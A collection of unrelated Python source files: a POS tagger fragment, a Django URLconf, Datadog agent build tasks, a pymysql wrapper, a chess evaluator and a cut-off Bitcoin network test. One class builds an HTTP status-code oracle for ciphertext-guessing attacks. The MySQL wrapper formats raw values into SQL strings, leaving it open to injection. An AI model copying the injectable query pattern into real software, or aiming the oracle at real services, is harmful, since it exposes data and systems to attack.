unigram_values=list(current_unigram_dict.values())
unigram_keys=list(current_unigram_dict.keys())
max_tag=unigram_keys[unigram_values.index(max(unigram_values))]
max_tag_unigram_dict[unigram]=max_tag
#Write the dictionary to a file outside the loop to save time
unigramfile.write(str(max_tag_unigram_dict))
unigramfile.close()
print("unigram-tag.txt saved succesfully.")
#Assign the most frequent tag calculated above to all words in training set
unigramresultfile=open("unigram-results.txt","w")
unigramresult="" #String that holds all sentences after they've been tagged using unigram model
true_unigam_tag_counts=0 #To count how many assigned tags match the original correct tags
false_unigam_tag_counts=0 #To count how many assigned tags were assigned wrongly
unknown_correct=0
all_unknown={} #Dictionary of all unknown unigrams
unigram_confusion={} # { (tag1(true), tag2(model)) : freq }
hapax=givesingletons(unigram_list)
hapax_tags=[]
for elem in hapax:
hapax_tags.append(max_tag_unigram_dict[elem])
#We have multiple models to assign tags to unknown words
print("Enter model number you would like to use : 0,1 or 2 based on:")
print("Approach 0: Mark all unknowns as UNK tags")
print("Approach 1: For unknown unigrams, give them a random tag with equal prob (1/n)")
print("Approach 2: For unknown unigrams, give them a random tag where the random prob is based ONLY ON THE UNIGRAMS WHICH APPEARED ONCE in the training data set.")
inp=int(input("Enter your choice:\n"))
for sent in test_sent:
for word in sent.split():
#Extract unigram and true_tag from "unigram/true_tag"
unigram=word.rsplit("/",1)[0]
true_tag=word.rsplit("/",1)[1]
#Find out tag based on our model:
#If the current unigram is a known unigram, then assign it the tag calculated earlier
if unigram in max_tag_unigram_dict:
model_tag=max_tag_unigram_dict[unigram]
#If it's unknown, we have various strategies for that
else:
if inp==0:
model_tag="UNK"
if inp==1:
model_tag=random.choice(tag_set)
# if inp==2: #MODEL SCRAPPED AS NOT ENOUGH TIME
# model_tag=weighted_random_tag(tag_list)
if inp==2:
model_tag=random.choice(hapax_tags)
if model_tag==true_tag:
unknown_correct+=1
all_unknown.setdefault(unigram,0)
all_unknown[unigram]=all_unknown[unigram]+1
unigramresult=unigramresult+"{}/{} ".format(unigram,model_tag)
#Update true and false tag counters
if true_tag==model_tag:
true_unigam_tag_counts+=1
else:
false_unigam_tag_counts+=1
#CONFUSION
unigram_confusion.setdefault((true_tag,model_tag),0)
unigram_confusion[(true_tag,model_tag)]+=1
unigramresult=unigramresult+"\n"
unigramresultfile.write(unigramresult)
unigramresultfile.close()
print("unigram-results.txt saved succesfully.")
unigram_accuracy=100*true_unigam_tag_counts/(false_unigam_tag_counts+true_unigam_tag_counts)
unknown_accuracy=unknown_correct/len(all_unknown)
print("Unigram Tagger Accuracy is {}%".format(unigram_accuracy))
print("Total unknowns is {}".format(len(all_unknown)))
print("Unknown Accuracy is {}%".format(unknown_accuracy))
#all_unknown_list=list(all_unknown.keys())
#Subpart 2 - Bigram
print("------------BIGRAM------------")
next_word_list=all_words[1:]
bigram_word_list=combine_lists(all_words,next_word_list)
bigram_tagger_dict={} # Word1:{Tag1:{Possible Next Tags: Count},Tag2:{Possible Next Tags: Count}},Word2:...
bigramfile=open("bigram-tag.txt","w")
bigramtagtext="The format is:\nCurrent Word:\n\tPrevious Tag:\n\t\tNext Tag :\tFrequency\n-------------------\n"
#Order is Count(previous,next)
for i in range(len(bigram_word_list)):
bigram_4_parts=bigram_word_list[i].replace(" ","/").rsplit("/")
prev_tag=bigram_4_parts[1]
next_tag=bigram_4_parts[3]
next_word=bigram_4_parts[2]
if next_word in bigram_tagger_dict:
next_word_dict=bigram_tagger_dict[next_word]
else:
next_word_dict={}
both_tags=bigram_4_parts[1]+bigram_4_parts[3]
if prev_tag in next_word_dict:
tag_dict=next_word_dict[prev_tag]
else:
tag_dict={}
if next_tag not in tag_dict:
tag_dict[next_tag]=0
tag_dict[next_tag]=tag_dict[next_tag]+1
next_word_dict[prev_tag]=tag_dict
bigram_tagger_dict[next_word]=next_word_dict
bigramfile.write(str(bigram_tagger_dict))
bigramfile.close()
print("bigram-tag.txt saved succesfully.")
#Calculate the most probable next tag given previous tag for current word:
bigramresultfile=open("bigram-results.txt","w")
bigramresult="" #String that holds all sentences after they've been tagged using unigram model
true_bigam_tag_counts=0 #To count how many assigned tags match the original correct tags
false_bigam_tag_counts=0 #To count how many assigned tags were assigned wrongly
unknown_correct_bigram=0
all_unknown_bigram={}
bigram_confusion={} # { (tag1(true), tag2(model)) : freq }
i=0
j=0
print("Enter model number you would like to use : 1 or 2 based on:")
print("Approach 1: For unknown words, give them a random tag with equal prob (1/n)")
print("Approach 2: For unknown words, give them a random tag where the random prob is based ONLY ON THE UNIGRAMS WHICH APPEARED ONCE in the training data set.")
inp2=int(input("Enter your choice:\n"))
starting_tag="." #Because this is a new sentence.
for sent in test_sent:
for word in sent.split():
if i==0 and j==0:
prev_tag=starting_tag
#Extract unigram and true_tag from "unigram/true_tag"
unigram=word.rsplit("/",1)[0]
true_tag=word.rsplit("/",1)[1]
if unigram in bigram_tagger_dict:
try:
bigram_model_tag=keywithmaxval(bigram_tagger_dict[unigram][prev_tag])
except Exception as e:
#WORD FOUND, BUT NO TAG FOR PREV_TAG FOR THIS WORD Unknown Model
if inp2==1:
bigram_model_tag=random.choice(tag_set)
if inp2==2:
bigram_model_tag=random.choice(hapax_tags)
#bigram_model_tag=givetaggivenword(bigram_tagger_dict[unigram])
else:
#WORD NOT FOUND: Unkown Model
if inp2==1:
bigram_model_tag=random.choice(tag_set)
if inp2==2:
bigram_model_tag=random.choice(hapax_tags)
all_unknown_bigram.setdefault(prev_tag,0)
all_unknown_bigram[prev_tag]=all_unknown_bigram[prev_tag]+1
bigramresult=bigramresult+"{}/{} ".format(unigram,bigram_model_tag)
if true_tag==bigram_model_tag:
true_bigam_tag_counts+=1
else:
false_bigam_tag_counts+=1
#CONFUSION
bigram_confusion.setdefault((true_tag,model_tag),0)
bigram_confusion[(true_tag,model_tag)]+=1
prev_tag=bigram_model_tag
j+=1
bigramresult=bigramresult+"\n"
i+=1
bigramresultfile.write(bigramresult)
bigramresultfile.close()
print("bigram-results.txt saved succesfully.")
bigram_accuracy=100*true_bigam_tag_counts/(false_bigam_tag_counts+true_bigam_tag_counts)
unknown_accuracy_bigram=unknown_correct_bigram/len(all_unknown_bigram)
print("Bigram Tagger Accuracy is {}%".format(bigram_accuracy))
print("Total unknowns is {}".format(len(all_unknown_bigram)))
print("Unknown Accuracy is {}%".format(unknown_accuracy_bigram))
print("------------CONFUSION MATRICES------------")
#A part of the below code has been re-used from my earlier assignment https://github.com/AKnightWing/bigram/blob/master/comp_ling.py
#Unigram Tagger Confusion Matrix
#Normalise both confusion dictionarues
for key in unigram_confusion:
unigram_confusion[key]=100*unigram_confusion[key]/false_unigam_tag_counts
for key in bigram_confusion:
bigram_confusion[key]=100*bigram_confusion[key]/false_bigam_tag_counts
firstrow=[' '] #The first row in the 2D list
for key in tag_set:
firstrow.append(key)
unigram_matrix=[] #A n*n 2D list which stores only the skeleton of the matrix
for i in range(len(tag_set)+1):
if i==0:
unigram_matrix.append(firstrow)
else:
row=[]
for j in range(len(tag_set)+1):
if j==0:
row.append(firstrow[i])
else:
try:
row.append(unigram_confusion[(tag_set[i]),(tag_set[j])])
except Exception as e:
row.append("0")
unigram_matrix.append(row)
bigram_matrix=[]
for i in range(len(tag_set)+1):
if i==0:
bigram_matrix.append(firstrow)
else:
row=[]
for j in range(len(tag_set)+1):
if j==0:
row.append(firstrow[i])
else:
try:
row.append(bigram_confusion[(tag_set[i]),(tag_set[j])])
except Exception as e:
row.append("0")
bigram_matrix.append(row)
with open('unigram_confusion.csv', 'w') as writeFile:
writer = csv.writer(writeFile)
writer.writerows(unigram_matrix)
writeFile.close()
print("unigram_confusion.csv saved succesfully.")
with open('bigram_confusion.csv', 'w') as writeFile2:
writer = csv.writer(writeFile2)
writer.writerows(bigram_matrix)
writeFile2.close()
print("bigram_confusion.csv saved succesfully.")
t2=time.time()
print("Total time taken by program = {} seconds".format(t2-t1)) |
py | 1a37e9843a2b361d5920ac4fb0e48d5b70693dbf | """tnapp URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
# from django.contrib import admin
import xadmin
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
# path('admin/', admin.site.urls),
path(r'', xadmin.site.urls),
] |
py | 1a37eafe6bdb9915aa0557a9b6df3cc7e6ecd17c | """
Agent namespaced tasks
"""
from __future__ import print_function
import glob
import os
import shutil
import sys
import platform
from distutils.dir_util import copy_tree
import invoke
from invoke import task
from invoke.exceptions import Exit
from .utils import bin_name, get_build_flags, get_version_numeric_only, load_release_versions
from .utils import REPO_PATH
from .build_tags import get_build_tags, get_default_build_tags, LINUX_ONLY_TAGS, DEBIAN_ONLY_TAGS
from .go import deps
# constants
BIN_PATH = os.path.join(".", "bin", "agent")
AGENT_TAG = "datadog/agent:master"
DEFAULT_BUILD_TAGS = [
"apm",
"consul",
"cpython",
"docker",
"ec2",
"etcd",
"gce",
"jmx",
"kubeapiserver",
"kubelet",
"log",
"systemd",
"process",
"snmp",
"zk",
"zlib",
]
@task
def build(ctx, rebuild=False, race=False, build_include=None, build_exclude=None,
puppy=False, use_embedded_libs=False, development=True, precompile_only=False,
skip_assets=False):
"""
Build the agent. If the bits to include in the build are not specified,
the values from `invoke.yaml` will be used.
Example invokation:
inv agent.build --build-exclude=snmp,systemd
"""
build_include = DEFAULT_BUILD_TAGS if build_include is None else build_include.split(",")
build_exclude = [] if build_exclude is None else build_exclude.split(",")
ldflags, gcflags, env = get_build_flags(ctx, use_embedded_libs=use_embedded_libs)
if not sys.platform.startswith('linux'):
for ex in LINUX_ONLY_TAGS:
if ex not in build_exclude:
build_exclude.append(ex)
# remove all tags that are only available on debian distributions
distname = platform.linux_distribution()[0].lower()
if distname not in ['debian', 'ubuntu']:
for ex in DEBIAN_ONLY_TAGS:
if ex not in build_exclude:
build_exclude.append(ex)
if sys.platform == 'win32':
# This generates the manifest resource. The manifest resource is necessary for
# being able to load the ancient C-runtime that comes along with Python 2.7
# command = "rsrc -arch amd64 -manifest cmd/agent/agent.exe.manifest -o cmd/agent/rsrc.syso"
ver = get_version_numeric_only(ctx)
build_maj, build_min, build_patch = ver.split(".")
command = "windmc --target pe-x86-64 -r cmd/agent cmd/agent/agentmsg.mc "
ctx.run(command, env=env)
command = "windres --define MAJ_VER={build_maj} --define MIN_VER={build_min} --define PATCH_VER={build_patch} ".format(
build_maj=build_maj,
build_min=build_min,
build_patch=build_patch
)
command += "-i cmd/agent/agent.rc --target=pe-x86-64 -O coff -o cmd/agent/rsrc.syso"
ctx.run(command, env=env)
if puppy:
# Puppy mode overrides whatever passed through `--build-exclude` and `--build-include`
build_tags = get_default_build_tags(puppy=True)
else:
build_tags = get_build_tags(build_include, build_exclude)
cmd = "go build {race_opt} {build_type} -tags \"{go_build_tags}\" "
cmd += "-o {agent_bin} -gcflags=\"{gcflags}\" -ldflags=\"{ldflags}\" {REPO_PATH}/cmd/agent"
args = {
"race_opt": "-race" if race else "",
"build_type": "-a" if rebuild else ("-i" if precompile_only else ""),
"go_build_tags": " ".join(build_tags),
"agent_bin": os.path.join(BIN_PATH, bin_name("agent", android=False)),
"gcflags": gcflags,
"ldflags": ldflags,
"REPO_PATH": REPO_PATH,
}
ctx.run(cmd.format(**args), env=env)
# Render the configuration file template
#
# We need to remove cross compiling bits if any because go generate must
# build and execute in the native platform
env.update({
"GOOS": "",
"GOARCH": "",
})
cmd = "go generate {}/cmd/agent"
ctx.run(cmd.format(REPO_PATH), env=env)
if not skip_assets:
refresh_assets(ctx, development=development)
@task
def refresh_assets(ctx, development=True):
"""
Clean up and refresh Collector's assets and config files
"""
# ensure BIN_PATH exists
if not os.path.exists(BIN_PATH):
os.mkdir(BIN_PATH)
dist_folder = os.path.join(BIN_PATH, "dist")
if os.path.exists(dist_folder):
shutil.rmtree(dist_folder)
copy_tree("./cmd/agent/dist/", dist_folder)
copy_tree("./pkg/status/dist/", dist_folder)
copy_tree("./cmd/agent/gui/views", os.path.join(dist_folder, "views"))
if development:
copy_tree("./dev/dist/", dist_folder)
# copy the dd-agent placeholder to the bin folder
bin_ddagent = os.path.join(BIN_PATH, "dd-agent")
shutil.move(os.path.join(dist_folder, "dd-agent"), bin_ddagent)
@task
def run(ctx, rebuild=False, race=False, build_include=None, build_exclude=None,
puppy=False, skip_build=False):
"""
Execute the agent binary.
By default it builds the agent before executing it, unless --skip-build was
passed. It accepts the same set of options as agent.build.
"""
if not skip_build:
build(ctx, rebuild, race, build_include, build_exclude, puppy)
ctx.run(os.path.join(BIN_PATH, bin_name("agent")))
@task
def system_tests(ctx):
"""
Run the system testsuite.
"""
pass
@task
def image_build(ctx, base_dir="omnibus"):
"""
Build the docker image
"""
base_dir = base_dir or os.environ.get("OMNIBUS_BASE_DIR")
pkg_dir = os.path.join(base_dir, 'pkg')
list_of_files = glob.glob(os.path.join(pkg_dir, 'datadog-agent*_amd64.deb'))
# get the last debian package built
if not list_of_files:
print("No debian package build found in {}".format(pkg_dir))
print("See agent.omnibus-build")
raise Exit(code=1)
latest_file = max(list_of_files, key=os.path.getctime)
shutil.copy2(latest_file, "Dockerfiles/agent/")
ctx.run("docker build -t {} Dockerfiles/agent".format(AGENT_TAG))
ctx.run("rm Dockerfiles/agent/datadog-agent*_amd64.deb")
@task
def integration_tests(ctx, install_deps=False, race=False, remote_docker=False):
"""
Run integration tests for the Agent
"""
if install_deps:
deps(ctx)
test_args = {
"go_build_tags": " ".join(get_default_build_tags()),
"race_opt": "-race" if race else "",
"exec_opts": "",
}
if remote_docker:
test_args["exec_opts"] = "-exec \"inv docker.dockerize-test\""
go_cmd = 'go test {race_opt} -tags "{go_build_tags}" {exec_opts}'.format(**test_args)
prefixes = [
"./test/integration/config_providers/...",
"./test/integration/corechecks/...",
"./test/integration/listeners/...",
"./test/integration/util/kubelet/...",
]
for prefix in prefixes:
ctx.run("{} {}".format(go_cmd, prefix))
@task(help={'skip-sign': "On macOS, use this option to build an unsigned package if you don't have Datadog's developer keys."})
def omnibus_build(ctx, puppy=False, log_level="info", base_dir=None, gem_path=None,
skip_deps=False, skip_sign=False, release_version="nightly", omnibus_s3_cache=False):
"""
Build the Agent packages with Omnibus Installer.
"""
if not skip_deps:
deps(ctx, no_checks=True) # no_checks since the omnibus build installs checks with a dedicated software def
# omnibus config overrides
overrides = []
# base dir (can be overridden through env vars, command line takes precedence)
base_dir = base_dir or os.environ.get("OMNIBUS_BASE_DIR")
if base_dir:
overrides.append("base_dir:{}".format(base_dir))
overrides_cmd = ""
if overrides:
overrides_cmd = "--override=" + " ".join(overrides)
with ctx.cd("omnibus"):
env = load_release_versions(ctx, release_version)
cmd = "bundle install"
if gem_path:
cmd += " --path {}".format(gem_path)
ctx.run(cmd, env=env)
omnibus = "bundle exec omnibus.bat" if sys.platform == 'win32' else "bundle exec omnibus"
cmd = "{omnibus} build {project_name} --log-level={log_level} {populate_s3_cache} {overrides}"
args = {
"omnibus": omnibus,
"project_name": "puppy" if puppy else "agent",
"log_level": log_level,
"overrides": overrides_cmd,
"populate_s3_cache": ""
}
if omnibus_s3_cache:
args['populate_s3_cache'] = " --populate-s3-cache "
if skip_sign:
env['SKIP_SIGN_MAC'] = 'true'
ctx.run(cmd.format(**args), env=env)
@task
def clean(ctx):
"""
Remove temporary objects and binary artifacts
"""
# go clean
print("Executing go clean")
ctx.run("go clean")
# remove the bin/agent folder
print("Remove agent binary folder")
ctx.run("rm -rf ./bin/agent")
|
py | 1a37eb2adabd9d49eb82870c2dfeb63dcb59e0b4 | import pymysql
from .function import create_insert_sql_values, create_update_sql, create_insert_sql_column
from . import SQLConfig
class MySqldb(object):
def __init__(self):
self.SQLConfig = SQLConfig
# self.db = pymysql.connect(SQLConfig.SQL_ADDRESS,SQLConfig.SQL_USERNAME,\
# SQLConfig.SQL_PASSWORD,SQLConfig.SQL_DATABASE)
def connect(self):
self.db = pymysql.connect(self.SQLConfig.SQL_ADDRESS,self.SQLConfig.SQL_USERNAME,\
self.SQLConfig.SQL_PASSWORD,self.SQLConfig.SQL_DATABASE)
# 一共就四个方法,增删改查。
# 增,也就是insert
# 增加一共有两个变量,一个是需要增加到哪个表里面去,另一个是数据。
# 数据必须是一个dict
def insert(self, table, values):
if not isinstance(values,dict):
raise TypeError('values must be dict')
if not isinstance(table,str):
raise TypeError('table must be str')
cursor = self.db.cursor()
# 创建sql
sql = "INSERT INTO %s%s VALUES %s"%(table,\
create_insert_sql_column(values),create_insert_sql_values(values))
try:
cursor.execute(sql)
self.db.commit()
return True
except:
print('insert fail')
return False
# 删除,变量只有两个
# 表名, 条件
def delete(self, table, condition):
if not isinstance(condition,dict):
raise TypeError('condition must be dict')
if not isinstance(table,str):
raise TypeError('table must be str')
cursor = self.db.cursor()
sql = "DELETE FROM %s WHERE %s = '%s'" % \
(table,list(condition.keys())[0],condition[list(condition.keys())[0]])
try:
cursor.execute(sql)
self.db.commit()
return True
except:
print('delete fail')
return False
# 改
# 传入参数依次为,表名,需要修改的值, 寻找条件
def update(self, table, values, condition):
if not isinstance(condition,dict):
raise TypeError('condition must be dict')
if not isinstance(values,dict):
raise TypeError('values must be dict')
if not isinstance(table,str):
raise TypeError('table must be str')
cursor = self.db.cursor()
sql = "UPDATE %s SET %s WHERE %s = '%s'"%\
(table,create_update_sql(values),list(condition.keys())[0],condition[list(condition.keys())[0]])
try:
print(sql)
cursor.execute(sql)
self.db.commit()
return True
except:
print("update fail")
return False
# 全查
# 传入参数依次:表名
def list_all(self, table):
if not isinstance(table,str):
raise TypeError('table must be str')
cursor = self.db.cursor()
# 获取当前表头
sql = "select COLUMN_NAME from information_schema.COLUMNS where table_name = '%s'"%(table)
cursor.execute(sql)
table_name = cursor.fetchall()
table_column = []
for i in table_name:
table_column.append(i[0])
sql = "SELECT * FROM %s" % (table)
try:
cursor.execute(sql)
table_data = []
data = cursor.fetchall()
for i in data:
table_data.append(dict(zip(table_column,list(i))))
return table_data
except:
print('get fail')
return False
def list_one(self, table, condition):
if not isinstance(condition,dict):
raise TypeError('condition must be dict')
if not isinstance(table,str):
raise TypeError('table must be str')
cursor = self.db.cursor()
# 获取当前表头
sql = "select COLUMN_NAME from information_schema.COLUMNS where table_name = '%s'"%(table)
cursor.execute(sql)
table_name = cursor.fetchall()
table_column = []
for i in table_name:
table_column.append(i[0])
sql = "SELECT * FROM %s WHERE %s = '%s'" % (table,\
list(condition.keys())[0], condition[list(condition.keys())[0]])
try:
cursor.execute(sql)
table_data = []
data = cursor.fetchall()
for i in data:
table_data.append(dict(zip(table_column,list(i))))
return table_data
except:
print("list one fail")
return False
def list_column(self, table, columns):
if not isinstance(table,str):
raise TypeError('table must be str')
if not isinstance(columns,list):
raise TypeError('columns must be list')
cursor = self.db.cursor()
sql = "SELECT %s FROM %s" % (",".join(columns),table)
try:
cursor.execute(sql)
data = cursor.fetchall()
columnData = []
for i in data:
columnData.append(i[0])
return columnData
except:
print("list one fail")
return False
def close(self):
self.db.close() |
py | 1a37eb3389c9c44c338607bf2cb7d804e6b35802 | from oracles.abstract_oracle import *
from json import loads
import requests
class WebStatusBinaryOracle(AbstractOracle):
name = 'web_status_boolean_oracle'
description = 'Creates a binary oracle based on HTTP status code'
arguments = [OracleArgumentDescription('url','Base URL', True),
OracleArgumentDescription('verb', 'HTTP Method for the request', False, defaultValue='GET'),
OracleArgumentDescription('cipherparam', 'Parameter that contains the ciphertext', True),
OracleArgumentDescription('params', 'Other parameters to add to the request', False, defaultValue='{}'),
OracleArgumentDescription('goodstatuses', 'Comma separated list of good status codes', True),
]
def makeoracle(self):
url = self.get_argument_value('url')
verb = self.get_argument_value('verb')
cipherparam = self.get_argument_value('cipherparam')
paramstring = self.get_argument_value('params')
params = loads(paramstring)
goodstatuses = set(map(int,self.get_argument_value('goodstatuses').split(',')))
def oracle(ctext):
params[cipherparam] = ctext
if verb == 'GET':
resp = requests.get(url,params=params)
else:
resp = requests.post(url,params=params)
return resp.status_code in goodstatuses
return oracle |
py | 1a37ebd61e32dea222f3f267e299ebcb987aad1e | # Copyright 2021 Karan Sharma - [email protected]
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import chess
import tensorflow as tf
from tensorflow import keras
import numpy as np
piece_cp_values = {
chess.PAWN: 100,
chess.KNIGHT: 300,
chess.BISHOP: 300,
chess.ROOK: 500,
chess.QUEEN: 900,
chess.KING: 0
}
def boardToOneHotNNInput(board: chess.Board):
array = np.zeros(320, dtype=int)
piecesDict = board.piece_map()
white_map = {
chess.PAWN: [100, 0, 0, 0, 0],
chess.KNIGHT: [0, 100, 0, 0, 0],
chess.BISHOP: [0, 0, 100, 0, 0],
chess.ROOK: [0, 0, 0, 100, 0],
chess.QUEEN: [0, 0, 133, 100, 0],
chess.KING: [0, 0, 0, 0, 100]
}
black_map = {
chess.PAWN: [-100, 0, 0, 0, 0],
chess.KNIGHT: [0, -100, 0, 0, 0],
chess.BISHOP: [0, 0, -100, 0, 0],
chess.ROOK: [0, 0, 0, -100, 0],
chess.QUEEN: [0, 0, -133, -100, 0],
chess.KING: [0, 0, 0, 0, -100]
}
data_map = {
chess.WHITE: white_map,
chess.BLACK: black_map
}
for square in piecesDict:
piece = piecesDict.get(square)
array[square*5:(square+1)*5] = data_map[piece.color][piece.piece_type]
return np.array([array])
class Evaluator:
def __init__(self, num_inputs: int, hidden_layer_sizes=[32, 32]):
input = keras.Input(shape=(num_inputs,))
x = input
for i in range(len(hidden_layer_sizes)):
x = keras.layers.Dense(hidden_layer_sizes[i], activation="relu")(x)
output = keras.layers.Dense(1)(x)
self.model = keras.Model(inputs=input, outputs=output)
def __init__(self, model: keras.Model):
self.model = model
def func(self, board: chess.Board) -> float:
return 0.0
@classmethod
def randomModelFromModel(cls, model: keras.Model, deviation=1):
new_model = keras.models.clone_model(model)
for layer in new_model.layers:
layer.set_weights(np.random.uniform(layer.get_weights() - deviation, layer.get_weights() + deviation))
return Evaluator(new_model)
class Evaluator_Type3(Evaluator):
def func(self, board: chess.Board) -> float:
return self.model.predict(boardToOneHotNNInput(board))
class ColorError(Exception):
"""Raised if the wrong chess color was detected"""
pass
class Engine:
def __init__(self, evaluator: Evaluator, color: chess.Color):
self.evaluator = evaluator
self.color = color
def best_move(self, board: chess.Board) -> chess.Move:
if board.turn != self.color:
raise ColorError
def is_better(x, y):
if self.color == chess.WHITE:
return x > y
else:
return y > x
high = None
best_move = None
for move in board.legal_moves:
board.push(move)
rating = self.evaluator.func(board)
print("Considering " + move.uci() + ": " + str(rating)) #DEBUG
if high is None or is_better(rating, high):
high = rating
best_move = move
board.pop()
return best_move
# -------------------------------------------------- DEPRECATED CODE -------------------------------------------------
def boardToNNInput_deprecated(board: chess.Board):
array = np.zeros(64, dtype=int)
piecesDict = board.piece_map()
for square in piecesDict:
if piecesDict.get(square).color == chess.WHITE:
array[square] = piece_cp_values[piecesDict.get(square).piece_type]
else:
array[square] = -piece_cp_values[piecesDict.get(square).piece_type]
return np.array([array])
class Evaluator_Type1_deprecated(Evaluator):
def func(self, board: chess.Board) -> float:
input = boardToNNInput_deprecated(board)
print("SHAPE:" + str(input.shape))
return self.model.predict(input)
|
py | 1a37ed157ebce18cbfaf2ef6c4f23324e1bffb2f | #!/usr/bin/env python2
#
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import time
'''
Test behavior of -maxuploadtarget.
* Verify that getdata requests for old blocks (>1week) are dropped
if uploadtarget has been reached.
* Verify that getdata requests for recent blocks are respecteved even
if uploadtarget has been reached.
* Verify that the upload counters are reset after 24 hours.
'''
# TestNode: bare-bones "peer". Used mostly as a conduit for a test to sending
# p2p messages to a node, generating the messages in the main testing logic.
class TestNode(NodeConnCB):
def __init__(self):
NodeConnCB.__init__(self)
self.connection = None
self.ping_counter = 1
self.last_pong = msg_pong()
self.block_receive_map = {}
def add_connection(self, conn):
self.connection = conn
self.peer_disconnected = False
def on_inv(self, conn, message):
pass
# Track the last getdata message we receive (used in the test)
def on_getdata(self, conn, message):
self.last_getdata = message
def on_block(self, conn, message):
message.block.calc_sha256()
try:
self.block_receive_map[message.block.sha256] += 1
except KeyError as e:
self.block_receive_map[message.block.sha256] = 1
# Spin until verack message is received from the node.
# We use this to signal that our test can begin. This
# is called from the testing thread, so it needs to acquire
# the global lock.
def wait_for_verack(self):
def veracked():
return self.verack_received
return wait_until(veracked, timeout=10)
def wait_for_disconnect(self):
def disconnected():
return self.peer_disconnected
return wait_until(disconnected, timeout=10)
# Wrapper for the NodeConn's send_message function
def send_message(self, message):
self.connection.send_message(message)
def on_pong(self, conn, message):
self.last_pong = message
def on_close(self, conn):
self.peer_disconnected = True
# Sync up with the node after delivery of a block
def sync_with_ping(self, timeout=30):
def received_pong():
return (self.last_pong.nonce == self.ping_counter)
self.connection.send_message(msg_ping(nonce=self.ping_counter))
success = wait_until(received_pong, timeout)
self.ping_counter += 1
return success
class MaxUploadTest(BitcoinTestFramework):
def __init__(self):
self.utxo = []
self.txouts = gen_return_txouts()
def add_options(self, parser):
parser.add_option("--testbinary", dest="testbinary",
default=os.getenv("NETAVOD", "netavod"),
help="netavod binary to test")
def setup_chain(self):
initialize_chain_clean(self.options.tmpdir, 2)
def setup_network(self):
# Start a node with maxuploadtarget of 200 MB (/24h)
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, ["-debug", "-maxuploadtarget=200", "-blockmaxsize=999000"]))
def mine_full_block(self, node, address):
# Want to create a full block
# We'll generate a 66k transaction below, and 14 of them is close to the 1MB block limit
for j in xrange(14):
if len(self.utxo) < 14:
self.utxo = node.listunspent()
inputs=[]
outputs = {}
t = self.utxo.pop()
inputs.append({ "txid" : t["txid"], "vout" : t["vout"]})
remchange = t["amount"] - Decimal("0.001000")
outputs[address]=remchange
# Create a basic transaction that will send change back to ourself after account for a fee
# And then insert the 128 generated transaction outs in the middle rawtx[92] is where the #
# of txouts is stored and is the only thing we overwrite from the original transaction
rawtx = node.createrawtransaction(inputs, outputs)
newtx = rawtx[0:92]
newtx = newtx + self.txouts
newtx = newtx + rawtx[94:]
# Appears to be ever so slightly faster to sign with SIGHASH_NONE
signresult = node.signrawtransaction(newtx,None,None,"NONE")
txid = node.sendrawtransaction(signresult["hex"], True)
# Mine a full sized block which will be these transactions we just created
node.generate(1)
def run_test(self):
# Before we connect anything, we first set the time on the node
# to be in the past, otherwise things break because the CNode
# time counters can't be reset backward after initialization
old_time = int(time.time() - 2*60*60*24*7)
self.nodes[0].setmocktime(old_time)
# Generate some old blocks
self.nodes[0].generate(130)
# test_nodes[0] will only request old blocks
# test_nodes[1] will only request new blocks
# test_nodes[2] will test resetting the counters
test_nodes = []
connections = []
for i in xrange(3):
test_nodes.append(TestNode())
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test_nodes[i]))
test_nodes[i].add_connection(connections[i])
NetworkThread().start() # Start up network handling in another thread
[x.wait_for_verack() for x in test_nodes]
# Test logic begins here
# Now mine a big block
self.mine_full_block(self.nodes[0], self.nodes[0].getnewaddress())
# Store the hash; we'll request this later
big_old_block = self.nodes[0].getbestblockhash()
old_block_size = self.nodes[0].getblock(big_old_block, True)['size']
big_old_block = int(big_old_block, 16)
# Advance to two days ago
self.nodes[0].setmocktime(int(time.time()) - 2*60*60*24)
# Mine one more block, so that the prior block looks old
self.mine_full_block(self.nodes[0], self.nodes[0].getnewaddress())
# We'll be requesting this new block too
big_new_block = self.nodes[0].getbestblockhash()
new_block_size = self.nodes[0].getblock(big_new_block)['size']
big_new_block = int(big_new_block, 16)
# test_nodes[0] will test what happens if we just keep requesting the
# the same big old block too many times (expect: disconnect)
getdata_request = msg_getdata()
getdata_request.inv.append(CInv(2, big_old_block))
max_bytes_per_day = 200*1024*1024
daily_buffer = 144 * MAX_BLOCK_SIZE
max_bytes_available = max_bytes_per_day - daily_buffer
success_count = max_bytes_available // old_block_size
# 144MB will be reserved for relaying new blocks, so expect this to
# succeed for ~70 tries.
for i in xrange(success_count):
